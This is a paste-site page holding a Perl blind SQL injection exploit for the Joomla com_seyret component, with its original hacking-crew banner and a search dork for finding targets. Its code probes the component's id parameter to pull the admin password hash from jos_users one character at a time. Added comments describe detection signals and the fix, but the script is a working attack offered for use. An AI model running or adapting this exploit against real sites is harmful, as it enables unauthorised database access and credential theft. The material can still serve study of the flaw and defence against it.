3xploit3r

Joomla com_seyret Blind SQL Injection Exploit

Aug 1st, 2016
  1. #!/usr/bin/perl
  2. use LWP::UserAgent;
  3. use Getopt::Long;
  4.  
  # Usage banner: printed, followed by exit, whenever the second positional
  # argument (the path) is missing or evaluates false.
  #
  # The "Dork" line is the URL fragment that marks a site as running the
  # com_seyret component; the same fragment is what an administrator would
  # search their own estate for when deciding what to patch or remove.
  #
  # NOTE(review): the system() call hands "Title ..." to the shell, which looks
  # like the Windows console `title` command -- confirm. Its exit status is
  # not checked.
  unless ($ARGV[1]) {
      system("Title Albanian Hacking Crew");
      print
          " \n",
          " #######################################################################\n",
          " # Joomla Component (com_seyret) Blind SQL Injection Exploit \n",
          " # -----------------------------------------------------------\n",
          " # Author: **RoAd_KiLlEr** \n",
          " # Greetz: Ton![W]indowS,X-n3t,b4cKd00r ~,DarkHacker.,The|DennY`\n",
          " # Site: www.a-h-crew.net\n",
          " # -----------------------------------------------------------\n",
          " # Dork : inurl:com_seyret \n",
          " # Usage: perl exploit.pl host path <options> \n",
          " # Example: perl exploit.pl www.host.com /path/ -a 3 \n",
          " # -----------------------------------------------------------\n",
          " # Options: \n",
          " # -a valid id \n",
          " #######################################################################\n";
      exit;
  }
  25.  
  # Positional arguments: the target host name and the path prefix that is
  # placed in front of index.php. $ARGV[2] is taken as the initial id value
  # before GetOptions() has processed @ARGV; it is replaced below when -a is
  # supplied with a true value.
  my ($host, $path) = @ARGV[0, 1];
  my $userid = 1;
  my $aid    = $ARGV[2];

  # Recognised options (stored in the file-level %options, which istrue2()
  # also reads):
  #   -u <int>  user id; handed to istrue2(), which does not place it in the query
  #   -p <str>  value appended to "http://" to form the HTTP proxy URL
  #   -a <int>  id value used as the base of the request's id parameter
  my %options = ();
  GetOptions(\%options, "u=i", "p=s", "a=i");

  print "[~] Exploiting...\n";

  # An option only overrides its default when its value is true, so a value
  # of 0 leaves the earlier assignment in place.
  $userid = $options{"u"} if $options{"u"};
  $aid    = $options{"a"} if $options{"a"};
  45.  
  # Character-by-character recovery of a 32-character value (labelled as an
  # MD5 hash in the output). Each position is resolved by asking istrue2()
  # one yes/no question per candidate character.
  #
  # What this looks like from the server side: at most 36 requests per
  # position, 1152 in total, all to the same URL and differing only in two
  # integers inside the id parameter. A burst of near-identical requests to
  # option=com_seyret&task=videodirectlink is therefore a usable signal for a
  # log review or a rate/pattern alert.
  syswrite(STDOUT, "[~] MD5-Hash: ", 14);

  for my $pos (1 .. 32) {
      # Candidates are tried in a fixed order: ASCII 48..57 ('0'-'9') first,
      # then 97..122 ('a'-'z'). The first hit is echoed and ends the search
      # for this position; when nothing matches, nothing is printed for it.
      for my $code (48 .. 57, 97 .. 122) {
          next unless istrue2($host, $path, $userid, $aid, $pos, $code);
          syswrite(STDOUT, chr($code), 1);
          last;
      }
  }

  print "\n[~] Exploiting done\n";
  77.  
  # istrue2 -- send one true/false probe and report the answer.
  #
  # Arguments (positional): host, path prefix, user id (accepted but not used
  # in the request), base id value, 1-based character position, ASCII code to
  # compare against.
  # Returns 1 when the response body contains the text "Back", otherwise 0.
  # The HTTP status is not inspected; only the body text decides the result.
  # Reads the file-level %options for the optional proxy (-p).
  #
  # The request sends the component's id parameter (task=videodirectlink)
  # with an SQL boolean condition appended. That this is expected to change
  # the page implies the component places id into its SQL statement without
  # validation, so the fix belongs in the component: cast id to an integer or
  # bind it as a query parameter. In access logs the probe appears as a GET
  # whose id value carries SQL keywords such as SELECT and SUBSTRING.
  # The query names the table jos_users literally; a site with a different
  # table prefix is not matched by this exact text, but that is not a fix for
  # the underlying flaw.
  sub istrue2 {
      my ($host, $path, $uid, $aid, $pos, $code) = @_;

      # The literal fragments are kept exactly as published.
      my $query = join '',
          "http://", $host, $path,
          "index.php? option=com_seyret&task=videodirectlink&id=", $aid,
          " and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),", $pos,
          ",1))=", $code;

      my $ua = LWP::UserAgent->new;
      $ua->proxy('http', "http://" . $options{"p"}) if $options{"p"};

      my $body   = $ua->get($query)->content;
      my $marker = "Back";

      return ($body =~ /$marker/) ? 1 : 0;
  }